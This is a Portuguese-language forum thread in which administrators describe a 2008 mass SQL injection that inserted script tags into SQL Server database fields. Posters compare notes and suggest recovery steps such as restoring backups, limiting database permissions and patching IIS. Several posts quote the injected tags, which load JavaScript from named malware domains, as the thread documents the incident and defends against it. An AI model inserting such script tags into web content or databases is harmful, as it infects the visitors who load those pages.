Segurança

[andregv 0]

Boa tarde, galera!

 

Não tão boa assim para a empresa que presto serviço.

 

Aparentemente o servidor de banco de dados foi atacado com sucesso aqui (SQL Server 2005).

 

Não sei precisar qual foi o método usado, porém, fala-se muito em força bruta... já que no LOG tem várias chamadas (de vários dias) de tentativas de acesso usando os usuários admin, root e sa...

 

Em vários campos do tipo varchar foram adicionado o conteúdo "<script src=http://www.killwow1.cn/g.js></script>"; muitos tiveram o conteúdo real trucando essa adição. Só sei que a galera de IT está se ferrando pra restabelecer o sistema.

 

Imaginei que só era, sei lá, restaurar um backup recente... até porque foi final de semana... porém... se acessaram o servidor... com uma dessas senhas... provavelmente tiveram acesso a tudo... inclusive aos backups... já soube de várias invasões... mas a maioria só mostravam que estiveram ali para testar suas técnicas... não para corromper dados... sei lá.

 

Alguém já ouviu falar algo sobre isso atualmente?

 

ps.: no script que foi incluído existe, está um comando para criar um iframe de uma página no referido domínio.

[Luiz Vieira 0]

andregv, estou com o mesmo problema... O servidor onde hospedamos o site de um de nossos clientes foi invadido e colocaram essa string que chama um vírus quando se abre o site, em cada campo de cada tabela. Tbm estou precisando de ajuda, quem descobrir primeiro, posta aqui! Valeu?! B)

[Prog 183]

Não tem mistério... os backups devem ser restaurados, preferencialmente num sistema operacional novo (afinal, o "hacker" pode ter feito outras coisas no sistema que não estão visiveis), agora, se o Backup do sistema era armazenado na mesma máquina do banco de dados, e sem segurança apropriada, isto é um outro problema, o ideal seria que o backup estivesse numa mídia externa ou num outro servidor.

 

Caso toda a restauração seja bem sucedida, reveja todas as politicas de senha e permissões dos usuários.

 

Boa sorte.

[andregv 0]

Bem... essa não é minha área... sou programador... e lido... no máximo... com procedures, udls e afins...

Acredito que gerenciar um servidor de internet requer muita técnica e, acima de tudo, está sempre up-time com atualizações e novas tecnologias de segurança.

 

Acredito que houve uma falha enorme do que diz respeito a monitoramente. Pelo que vi... as tentativas de acesso força bruta estão rodando desde meados do dia 20 do mês passado... e o Firewall??? Sei não.

 

Estou aqui mais como um curioso e, se for o caso, poder ajudar de alguma forma.

 

Certa vez já ouvi falar de recuperar dados (ROLLBACK) através do log... é possível ou estou falando besteira...?

 

Posto aqui qualquer novidade.

[advaldomesquita 93]

Ola.

Duvidas com segurança em banco de dados eh sempre chave.

Vou falar um pouco de casos que jah passei e que ainda infelizmente passo.

Qdo se fala em tabelas, alteracao de estrutura ou ateh msm troca de dados, pode-se dizer que 99% dos casos eh injection, vindo da programacao, o tal e famoso SQL Injection.

Eh preciso verificar muitas coisas, como o codigo que eh executado, seguranca em firewall, arquivo de conexao do db, tipo de ataque. você pode verificar pelo SQL Profiler, Analyzer, mas claro que você vai precisar de um adm. de rede para estes tipos de testes. Vao ter q verificar tb, portas, permissao de acesso, permissao do IIS, diretorios vituais. Pode ter tanta falha uma aplicação, que eh preferivel perder um tempo com ela off do que manter ela on e ficar sempre retornando bkp. E por falar em bkps, o ideal eh ser feito um full diario e transicionais a cada 5 minutos (dependendo do tamanho da database).

Eu consegui pegar um ataque de injetcion alanlisando o arquivo LDF com um software de terceiros. Nele, há todas as transações do DB.

 

Tentei passar algumas dicas, qq coisa estamos por aki.

 

Abçs e boa sorte.

 

Júnior http://forum.imasters.com.br/public/style_emoticons/default/devil.gif

[fcfurlani 0]

Boa tarde!

 

Nosso site também sofreu esta invasão!

 

Realmente este tipo de ataque é SQL injection e o invasor está utilizando vários domínios hospedados na China, são alguns deles (recomendo não entrar, a não ser que saiba o que está fazendo):

 

http://www.wowgm2.cn/ (script injetado: <script src=http://www.wowgm2.cn/m.js></script>)

 

http://www.ririwow.cn (<script src=http://www.ririwow.cn/jp.js></script>)

 

firestnamestea.cn (<script src=http://firestnamestea.cn/q.js></script>)

 

http://www.bluell.cn (<script src=http://www.bluell.cn/ip.js></script>)

 

http://www.killwow1.cn

 

 

http://www.wowyeye.cn (<script src=http://www.wowyeye.cn/m.js>)

 

http://www.kisswow.com.cn (<script src=http://www.kisswow.com.cn/m.js>)

 

Pesquisa no Google com: ".cn/*.js></script" , você encontra milhares de páginas infectadas, só no Brasil.

 

Os sites infectados quando aberto pelo cliente, infecta também o micro, por um Malware.

 

Por enquanto, nosso programador (eu sou administrador do sistema), não conseguiu resolver o problema. Tentou mas fomos invadidos por mais 3 vezes em uma semana.

 

Quando conseguirmos uma solução, postaremos aqui. Se alguém souber, seremos gratos.

 

Abraços a todos!

 

ah, olhem a mensagem que o invasor deixou no site http://www.wowgm2.cn (este já saiu do ar)

 

The invasion can not control bulk!!!!If the wrong target. Please forgive! Sorry if you are a hacker. send email to kiss117276@163.com my name is lonely-shadow TALK WITH ME! china is great! FUCK france! fuck CNN! fuck ! HACKER have matherland!

[EinsteinLD 0]

Olá pessoal!

 

Realmente, muitos sites brasileiros infectados neste feriadão. Tem de tudo: site da Globo, do Governo, etc....

 

Fizemos uma matéria sobre isso na Linha Defensiva

 

Ataques de SQL Injection atingem sites brasileiros

http://linhadefensiva.uol.com.br/2008/05/a...es-brasileiros/

 

Pra quem está enfrentando o problema, sugiro que aplique todos os patchs e atualizações no IIS 6 e verifique todas as chamadas do código ASP do site.

 

;)

 

 

Olá pessoal!

 

Realmente, muitos sites brasileiros infectados neste feriadão. Tem de tudo: site da Globo, do Governo, etc....

 

Fizemos uma matéria sobre isso na Linha Defensiva

 

Ataques de SQL Injection atingem sites brasileiros

http://linhadefensiva.uol.com.br/2008/05/a...es-brasileiros/

 

Pra quem está enfrentando o problema, sugiro que aplique todos os patchs e atualizações no IIS 6 e verifique todas as chamadas do código ASP do site.

 

;)

[Carlos Fróes 0]

Olá Pessoal.

 

Meu site compraja.com.br também faz parte dos que foram atacados na semana passada e resolvi o problema, pelo menos há uma semana os logs acusam tentativas incansáveis de injeção SQL mas não são bem sucedidas.

 

Identifiquei que o ataque foi através de SQL Injection utilizando query strings e posts em formulários onde os requests não eram tradados da forma adequada.

 

O código injetado modificou a estrutura das tabelas para varchar(50), possibilitando a adição do código malicioso, portanto, logo de cara notei que o usuário utilizado na connection string estava com direitos de modificação da estrutura do banco (por exemplo: ALTER TABLE).

 

Seguem os procedimentos que executei para segurar meu site:

 

1 - Tirei o site do ar

2 - Criei um software para modificar o conteúdo das tabelas afetadas. (o melhor é restaurar um backup saudável)

3 - Adicionei um usuário no BD SQL 2005 que só possui direitos de executar Insert, Select, Update, Delete e Stored Procedures.

4 - Troquei o usuário utilizado na Connection String para este usuário limitado.

5 - Implementei em todos os requests do site a chamada de uma função que verifica e remove qualquer tentativa de SQL Injection.

 

 

Comigo ocorreram duas invasões seguidas:

Na primeira invasão apenas restaurei o backup, que não resolveu.

Na segunda executei o procedimento acima e não ocorreram mais problemas, apesar do Log do IIS registrar as tentativas de invasão.

 

Espero ter ajudado.

 

Sds,

 

Carlos Fróes

www.compraja.com.br